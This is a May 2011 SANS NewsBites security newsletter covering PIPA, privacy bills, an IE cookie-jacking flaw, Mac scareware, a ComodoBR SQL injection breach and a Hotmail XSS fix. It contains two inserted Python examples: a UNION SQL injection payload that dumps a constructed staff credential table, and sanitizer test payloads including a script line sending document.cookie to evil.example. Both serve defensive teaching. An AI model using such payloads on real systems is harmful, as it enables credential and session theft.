
[Netsec] SANS NewsBites Vol. 13 Num. 42 : Wyden blocks anti-piracy bill



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Just 5 days until the early registration deadline for SANSFIRE 2011
(Washington, DC) saving you $400.  27 full-week immersion courses and a
dozen new short courses. Plus the free SANS @NIGHT presentations at
SANSFIRE are better than regular presentations at most other conferences
because they provide "what we have just learned" updates from the
incident handlers at the Internet Storm Center.
Info at: http://www.sans.org/sansfire-2011

                                       Alan

**************************************************************************
SANS NewsBites                  May 27, 2011             Vol. 13, Num. 042
**************************************************************************
TOP OF THE NEWS    
  Wyden Blocks Anti-Piracy Bill
  White House Cyber Security Proposal Met With Criticism From Legislators
  Senator Wants Google and Apple to Require Privacy Policies on Location-Aware Apps
THE REST OF THE WEEK'S NEWS 
    Cookie-jacking Flaw Found in IE
    Mac Scareware Variant Installs Without Password; Apple Acknowledges Problem
    Another Comodo SSL Certificate Reseller Attacked
    Google Updates Chrome to Version 11.0.696.71
    Hit Spammers at Their Payment Processors
    A New Twist on Pen Testing
    Microsoft Fixes Hotmail Cross-Site Scripting Flaw
***************************************************************************

TRAINING UPDATE
- -- SANS Rocky Mountain 2011, Denver, CO, June 25-30, 2011
8 courses.  Bonus evening presentations include SANS Hacklab and Why
End Users are Your Weakest Link
http://www.sans.org/rocky-mountain-2011/
- -- SANSFIRE 2011, Washington, DC, July 15-24, 2011
41 courses.  Bonus evening presentations include Ninja Developers:
Penetration Testing and Your SDLC; and Are Your Tools Ready for IPv6?
http://www.sans.org/sansfire-2011/
- -- SANS Boston 2011, Boston, MA, August 8-15, 2011
12 courses.  Bonus evening presentations include Cost Effectively
Implementing PCI through the Critical Controls; and More Practical
Insights on the 20 Critical Controls
http://www.sans.org/boston-2011/
- -- SANS Virginia Beach 2011, August 22- September 2, 2011
11 courses.   Bonus evening presentations include SANS Hacklab;
Offensive Countermeasures; and Evolving VoIP Threats
http://www.sans.org/virginia-beach-2011/
- -- SANS Ottawa 2011, Ottawa, Ontario, August 28- September 2, 2011
5 courses.   Bonus evening presentations include DNS Sinkhole: Peer
Into Your Network While You Sleep; and I See What You Did There:
Forensic Time Line Analysis
http://www.sans.org/ottawa-2011/
- -- SANS Network Security 2011, Las Vegas, NV, September 17-26, 2011
43 courses.   Bonus evening presentations include Securing the Kids;
Who is Watching the Watchers?; and Emerging Trends in the Law of
information Security and Investigations
http://www.sans.org/network-security-2011/
- -- Looking for training in your own community?
http://sans.org/community/ Save on On-Demand training (30 full
courses) - See samples at
http://www.sans.org/ondemand/discounts.php#current
Plus London, Austin, and Canberra all in the next 90 days.
For a list of all upcoming events, on-line and live: www.sans.org

************************* SPONSORED BY Symantec ***************************

Modern malware rarely strikes the same way twice. Today's malicious code
rapidly mutates, bypassing traditional defenses.  Traditional antivirus
approaches no longer work. Download the Symantec Endpoint Protection 12
beta to see how Symantec can help mitigate threats today and tomorrow
for both small businesses and the largest enterprises.

http://www.sans.org/info/78984

****************************************************************************

TOP OF THE NEWS
 --Wyden Blocks Anti-Piracy Bill
(May 26, 2011)
US Senator Ron Wyden (D-Oregon) has put a hold on a bill unanimously
approved by the Senate Judiciary Committee that would expand the
government's power to block and shut down web sites "dedicated to
infringing activities." The Protect IP Act (PIPA) would give the
government the authority to bring lawsuits against the sites and get
court orders that would require search engines to cease providing
links to the sites. In a statement, Wyden said, "By ceding control of
the Internet to corporations through a private right of action, and to
government agencies that do not sufficiently understand and value the
Internet, PIPA represents a threat to our economic future and to our
international objectives." Wyden put a hold on similar legislation
last year.
http://www.wired.com/threatlevel/2011/05/blacklisting-law-advances/
http://news.cnet.com/8301-31001_3-20066456-261.html
[Editor's Comment (Northcutt): According to Senate.gov, a "hold" is an
informal practice by which a Senator informs his or her floor leader
that he or she does not wish a particular bill or other measure to reach
the floor for consideration. The Majority Leader need not follow the
Senator's wishes, but is on notice that the opposing Senator may
filibuster (procedural methods to delay legislation) any motion to
proceed to consider the measure.  I think Sen. Wyden may be on the right
path here. The Internet, last I checked, is not a USA-only system. What
we could end up achieving is taking down a few web sites, but causing
search engines based in other countries to be the market search leaders.
http://www.senate.gov/reference/glossary_term/hold.htm
http://www.senate.gov/reference/glossary_term/filibuster.htm ]

 --White House Cyber Security Proposal Met With Criticism From Legislators
(May 23, 24 & 25, 2011)
Critics of a White House cyber security legislation proposal say that
it would allow government broader access to private information. The
proposal calls for private organizations to share cyber attack data with
DHS. It would take precedence over other laws' limits on government
access to private information. Companies sharing cyber attack
information with the government would be immune from prosecution,
harking back to the controversial immunity granted to telecommunications
companies participating in the government's warrantless wiretapping
following the September 11 attacks.
http://www.nextgov.com/nextgov/ng_20110525_7378.php?oref=topnews
http://www.computerworld.com/s/article/9217060/Lawmakers_question_Obama_cybersecurity_proposal?taxonomyId=17&pageNumber=1

 --Senator Wants Google and Apple to Require Privacy Policies on
    Location-Aware Apps
(May 25, 2011)
In a letter to Apple and Google executives, Senator Al Franken (D-Minn.)
has asked that the companies require privacy policies for
"location-aware" apps sold for their products. Franken would like to see
apps that track location data have straightforward privacy policies that
clarify exactly what information is collected, how the data are
collected and with what parties they are shared.
http://www.washingtonpost.com/blogs/post-tech/post/al-franken-asks-apple-google-to-require-app-privacy-policies/2011/05/25/AGd7aQBH_blog.html
http://www.computerworld.com/s/article/9217066/Senator_wants_privacy_policies_for_mobile_apps?taxonomyId=144

*******************************  SPONSORED LINKS  **************************
1) Hear industry experts discuss techniques to fight crimes at the
Forensics and Incident Response Summit in Austin, Texas June 7-8th. Make
sure to also attend any of the 4 post-Summit courses June 9-14th.
http://www.sans.org/info/78989

2) Learn how to secure your network during the IPv6 transition at the
Security Impact of IPv6 Summit July 15th in Washington DC and take
advantage of the post-Summit IPv6 Essentials course July 16th.
http://www.sans.org/info/78994
****************************************************************************

THE REST OF THE WEEK'S NEWS
 --Cookie-jacking Flaw Found in IE
(May 25 & 26, 2011)
An unpatched flaw in Microsoft Internet Explorer (IE) could allow
attackers to steal cookies from vulnerable computers and use them to
access password-protected websites. The vulnerability affects all
current versions of the browser running on Windows. The exploit requires
social engineering - manipulating the user into dragging and dropping
an object. A Microsoft spokesperson said the company does not consider
the flaw to be high risk because of the level of user interaction
required.
http://news.cnet.com/8301-1009_3-20066419-83.html?tag=mncol;title
http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/

 --Mac Scareware Variant Installs Without Password; Apple Acknowledges Problem
(May 24, 25 & 26, 2011)
A new variant of scareware that targets Mac users, called MacGuard, has
been detected, and this version does not require users to submit
administrator passwords to install. Earlier versions of Mac scareware,
which have gone by such names as Mac Defender, Mac Security and Mac
Protector, all required administrator passwords. Users are at risk if
they have set their Safari browsers to automatically open files
designated as safe.  Apple has acknowledged the scareware issue and says
it will release an update to detect and remove the malware. The company
has already published an advisory with recommendations for removing the
malware or avoiding infection.
The advisory from Apple is available at http://support.apple.com/kb/ht4650
http://www.h-online.com/security/news/item/Mac-Defender-variant-doesn-t-require-admin-password-1250910.html
http://www.informationweek.com/news/security/vulnerabilities/229625602
http://www.theregister.co.uk/2011/05/25/apple_acknowledges_macdefender/
http://www.bbc.co.uk/news/technology-13560137
http://www.computerworld.com/s/article/9217061/Newest_MacDefender_scareware_installs_without_a_password?taxonomyId=17
http://www.computerworld.com/s/article/9217034/Apple_admits_Mac_scareware_infections_promises_cleaning_tool?taxonomyId=17
http://www.v3.co.uk/v3-uk/news/2074168/mac-defender-scareware-variant-macguard-installs-admin-password

 --Another Comodo SSL Certificate Reseller Attacked
(May 24 & 25, 2011)
Another Comodo SSL certificate reseller has suffered an attack.
ComodoBR, the company's Brazilian partner, had portions of its database
accessed through an SQL injection attack. The compromised data include
customer information, submitted certificate requests and ComodoBR
employee access credentials. Earlier this year, another Comodo partner
was attacked and the attackers issued themselves certificates signed
with Comodo's root key. No certificates were issued in the attack on the
Brazilian reseller.
http://www.h-online.com/security/news/item/Another-Comodo-SSL-registrar-hacked-1250283.html
http://www.theregister.co.uk/2011/05/24/comodo_reseller_hacked/
http://www.eweek.com/c/a/Security/SQL-Injection-Attack-Expooses-Comodo-Partner-Customer-Data-530220/
[Editor's Comment (Northcutt): Certificate granting authorities are
among the highest margin business opportunities. You give me three
thousand dollars, I give you a string of bits. You would think they
would take security more seriously than anyone, because they have so
much to lose. On the organizational side of the house, these things
force one to rethink security architecture. Stuxnet code was signed with
a stolen certificate; more recently W32.Qakbot was signed with a
legitimate key:
http://www.symantec.com/connect/blogs/w32qakbot-under-surface ]
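The ComodoBR break-in above came through SQL injection. The following is an added example written for this page, not ComodoBR's or Comodo's code: the vulnerable pattern (user input formatted straight into the statement) beside the parameterized form that closes it. The schema, the rows, the `staff` credential table and the payload are all constructed, and an in-memory sqlite3 database stands in for the reseller's back end.

```python
"""Added example (not ComodoBR's or Comodo's code): SQL injection against a
customer lookup, beside the parameterized query that defeats it. Schema,
rows, the staff table and the payload are constructed for this page."""
import sqlite3


def make_db():
    """Constructed sample data: certificate requests plus a staff credential table
    living in the same database, as the compromised reseller data suggests."""
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    cur.execute("CREATE TABLE cert_requests (customer TEXT, domain TEXT)")
    cur.execute("CREATE TABLE staff (username TEXT, password_hash TEXT)")
    cur.execute("INSERT INTO cert_requests VALUES ('acme', 'www.acme.example')")
    cur.execute("INSERT INTO cert_requests VALUES ('globex', 'mail.globex.example')")
    cur.execute("INSERT INTO staff VALUES ('admin', 'constructed-hash-value')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, customer):
    """Builds the statement by string formatting, so the input can change the
    query's structure instead of acting only as a value."""
    sql = "SELECT customer, domain FROM cert_requests WHERE customer = '%s'" % customer
    return conn.execute(sql).fetchall()


def lookup_safe(conn, customer):
    """Binds the input as a parameter; the driver never parses it as SQL."""
    sql = "SELECT customer, domain FROM cert_requests WHERE customer = ?"
    return conn.execute(sql, (customer,)).fetchall()


# Constructed UNION payload: closes the quoted literal, appends a SELECT over an
# unrelated table with the same column count, and comments out the trailing quote.
PAYLOAD = "x' UNION SELECT username, password_hash FROM staff --"


def demo():
    """Run the legitimate lookup and the payload through both implementations."""
    conn = make_db()
    return {
        "legit": lookup_safe(conn, "acme"),
        "vulnerable": lookup_vulnerable(conn, PAYLOAD),
        "safe": lookup_safe(conn, PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

Running `demo()` shows the vulnerable lookup returning the staff credential row while the parameterized lookup returns nothing for the same input. The fix is binding, not keyword filtering; and as the ComodoBR data set illustrates, a database account that can read employee credentials alongside customer records turns one injection point into a full compromise, so least-privilege accounts per application role limit the damage when a query is missed.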

 --Google Updates Chrome to Version 11.0.696.71
(May 25 & 26, 2011)
Google has issued a Chrome update to address four vulnerabilities, two
of which are rated critical. The critical flaws fixed in Chrome version
11.0.696.71 are a memory corruption bug in the GPU command buffer and
an out-of-bounds write issue in blob handling. The other two flaws, with
severity ratings of high and low respectively, are a stale pointer
vulnerability and a flaw that could allow bypassing the popup blocker.
Google will not release details of the issues until more users have been
updated.
http://gcn.com/articles/2011/05/25/ecg-google-releases-security-update-for-chrome.aspx?admgarea=TC_SECCYBERSSEC
http://www.h-online.com/security/news/item/Chrome-11-update-patches-critical-holes-1250075.html
http://www.computerworld.com/s/article/9217050/Google_patches_critical_Chrome_bugs

 --Hit Spammers at Their Payment Processors
(May 25, 2011)
Nearly all financial transactions arising from spam operations are
handled by just three banks, according to a paper from 15 researchers
from the University of California at Berkeley, the University of
California at San Diego, the International Computer Science Institute
and the Budapest University of Technology and Economics. The paper,
which "follows the money" from spam around the world, is scheduled to
be delivered next week at the IEEE Symposium on Security and Privacy
2011. The researchers gathered real spam data and made more than 100
purchases from the sites the messages led to. The three banks are
Azerigazbank in Azerbaijan, DnB NOR in Latvia, and St.
Kitts-Nevis-Anguilla National Bank in the Caribbean. As potential
solutions, the researchers recommend that issuing banks in the US refuse
to conduct "card not present" transactions for known spammers.
http://www.informationweek.com/news/security/client/229625599
http://www.networkworld.com/news/2011/052511-want-to-stop-junk-email.html
[Editor's Note (Schultz): This is one of the most interesting
information security research efforts in recent years.
(Honan): This is a very interesting development in the fight against
spam.  While changing hosting providers is a trivial matter for spam
operators, changing their payment processor is not easy, making it more
time consuming and costly for spammers to conduct their operations.
Should enough of these payment processors be identified and blacklisted,
it could have a major impact on the amount of spam flooding our
networks.]

 --A New Twist on Pen Testing
(May 25, 2011)
A computer network designed for a new Colorado Department of Corrections
maximum security facility received some penetration testing from the
prisoners themselves. The system is for a facility where prisoners are
isolated for 23 hours a day. Cells are equipped with thin client kiosks:
a monitor screen behind a clear plate, a headset, a mouse, and a
keyboard with limited functionality.  Prisoners watch television, and
receive calls and virtual visits through the system. "The network is
isolated from the Internet, and services hosted outside are delivered
through reverse proxy servers." A new image of the OS is loaded every
time the system boots. Because the prisoners are alone in their cells
for the majority of the day, they spent a lot of time trying to
circumvent the system. They discovered that opening more than 200
windows in IE caused a buffer overflow that overrode group policy and
allowed access to more functions through their keyboards.  They also
figured out how to access visitation systems and communicated with one
another. The issues revealed by their efforts have been addressed.
http://gcn.com/Articles/2011/05/30/Colorado-Prison-Sidebar.aspx?s=gcndaily_260511&p=1
http://gcn.com/Articles/2011/05/30/Colorado-Prison-Internet.aspx?p=1

 --Microsoft Fixes Hotmail Cross-Site Scripting Flaw
(May 24, 2011)
Microsoft has fixed a security issue in Hotmail that was being actively
exploited to steal users' messages and contact lists.  Attackers sent
targets email messages containing malicious scripts.  The embedded script
ran in the recipient's Hotmail session as soon as the message was opened
or previewed, and uploaded messages and contact lists to remote servers.
The attack was possible due to a cross-site scripting flaw, which has
been remedied.
http://www.theregister.co.uk/2011/05/24/microsoft_hotmail_email_theft_attack/
http://www.computerworld.com/s/article/9217032/Hackers_steal_Hotmail_messages_thanks_to_Web_flaw?taxonomyId=17
http://www.v3.co.uk/v3-uk/news/2073409/microsoft-patches-information-stealing-hotmail-bug
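The Hotmail flaw above let script carried inside a message body execute in the reader's session. As an added example written for this page, not Hotmail's code, the sanitizer below shows the defensive side of that problem: a webmail front end rebuilds each message body from an allowlist of tags and attributes, discards script and event handlers, and refuses non-http(s)/mailto link targets. The tag and attribute lists are this example's own choices, and the payloads are constructed.

```python
"""Added example (not Hotmail's code): an allowlist HTML sanitizer of the
kind a webmail front end must run over a message body before rendering it,
so script carried in a mail cannot run in the reader's session. Tag and
attribute lists are choices made here; the payloads below are constructed."""
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a",
                "ul", "ol", "li", "div", "span"}
ALLOWED_ATTRS = {"a": {"href"}, "div": {"class"}, "span": {"class"}}
VOID_TAGS = {"br"}
# Everything inside these elements is discarded, not just the tags.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object"}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")


def safe_url(value):
    """Accept only absolute http(s)/mailto URLs. Whitespace, control characters
    and case are stripped before the scheme check so 'java\\tscript:' or
    'JAVASCRIPT:' cannot slip through."""
    if value is None:
        return False
    cleaned = "".join(c for c in value if c.isprintable() and not c.isspace())
    return cleaned.lower().startswith(SAFE_URL_SCHEMES)


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside a dropped element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown tags (img, form, ...) vanish; their text stays
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops on* handlers, style=, src=, ...
            if name == "href" and not safe_url(value):
                continue
            kept.append(' %s="%s"' % (name, escape(value or "", quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))
    # Comments, declarations and processing instructions fall through to the
    # base class and are dropped.


def sanitize(html_body):
    """Return the body rebuilt from allowlisted tags and attributes. An unclosed
    <script> or <iframe> drops the rest of the body (fail closed)."""
    parser = Sanitizer()
    parser.feed(html_body)
    parser.close()
    return "".join(parser.out)


# Constructed payloads of the kind a session-stealing mail would carry.
PAYLOADS = {
    "handler_and_script": '<p onmouseover="alert(1)">Hi</p>'
                          '<script>fetch("https://evil.example/?c=" + document.cookie)</script>',
    "javascript_href": '<a href="javascript:alert(document.cookie)">claim prize</a>',
    "img_onerror": '<img src=x onerror="alert(1)">',
    "encoded_scheme": '<a href="JAVA&#9;SCRIPT:alert(1)">x</a>',
    "benign": '<p>Hello <b>world</b> <a href="https://example.com/?q=1&amp;r=2">link</a></p>',
}

if __name__ == "__main__":
    for name, body in PAYLOADS.items():
        print("%-20s %s" % (name, sanitize(body)))
```

The design point is that the sanitizer rebuilds output from what it recognizes rather than trying to delete what it fears: a denylist of `<script>` and `on*` misses the next encoding trick, whereas anything not on the allowlist never reaches the page. Relative links are dropped along with `javascript:` ones, which is the right trade-off for mail from untrusted senders.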

************************************************************************
The Editorial Board of SANS NewsBites

Eugene Schultz, Ph.D., CISM, CISSP, GLSC is CTO of Emagined Security and
the author/co-author of books on Unix security, Internet security,
Windows NT/2000 security, incident response, and intrusion detection and
prevention. He was also the co-founder and original project manager of
the Department of Energy's Computer Incident Advisory Capability (CIAC).

John Pescatore is Vice President at Gartner Inc.; he has worked in
computer and network security since 1978.

Stephen Northcutt founded the GIAC certification and currently serves
as President of the SANS Technology Institute, a post graduate level IT
Security College, www.sans.edu.

Dr. Johannes Ullrich is Chief Technology Officer of the Internet Storm
Center and Dean of the Faculty of the graduate school at the SANS
Technology Institute.

Ed Skoudis is co-founder of Inguardians, a security research and
consulting firm, and author and lead instructor of the SANS Hacker
Exploits and Incident Handling course.

Rob Lee is the curriculum lead instructor for the SANS Institute's
computer forensic courses (computer-forensics.sans.org) and a Director
at the incident response company Mandiant.

Rohit Dhamankar is a security professional currently involved in
independent security research.

Tom Liston is a Senior Security Consultant and Malware Analyst for
Inguardians, a handler for the SANS Institute's Internet Storm Center,
and co-author of the book Counter Hack Reloaded.

Dr. Eric Cole is an instructor, author and fellow with The SANS
Institute. He has written five books, including Insider Threat and he
is a founder with Secure Anchor Consulting.

Ron Dick directed the National Infrastructure Protection Center (NIPC)
at the FBI and served as President of the InfraGard National
Members Alliance - with more than 22,000 members.

Mason Brown is one of a very small number of people in the information
security field who have held a top management position in a Fortune 50
company (Alcoa).  He is leading SANS' global initiative to improve
application security.

David Hoelzer is the director of research & principal examiner for
Enclave Forensics and a senior fellow with the SANS Technology
Institute.

Mark Weatherford, Chief Security Officer, North American Electric
Reliability Corporation (NERC).

Alan Paller is director of research at the SANS Institute.

Marcus J. Ranum built the first firewall for the White House and is
widely recognized as a security products designer and industry
innovator.

Clint Kreitner is the founding President and CEO of The Center for
Internet Security.

Brian Honan is an independent security consultant based in Dublin, Ireland.

David Turley is SANS infrastructure manager and serves as production
manager and final editor on SANS NewsBites.

Please feel free to share this with interested parties via email, but
no posting is allowed on web sites. For a free subscription, (and for
free posters) or to update a current subscription, visit
http://portal.sans.org/


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (Darwin)
Comment: GPGTools - http://gpgtools.org

iEYEARECAAYFAk3fzH8ACgkQ+LUG5KFpTkamXwCgh5LehvfX/pV5uuvhHdZPkPUg
NqsAn0UEeKvJfZAEHPlgRvScIR7qiG7U
=A2Vd
-----END PGP SIGNATURE-----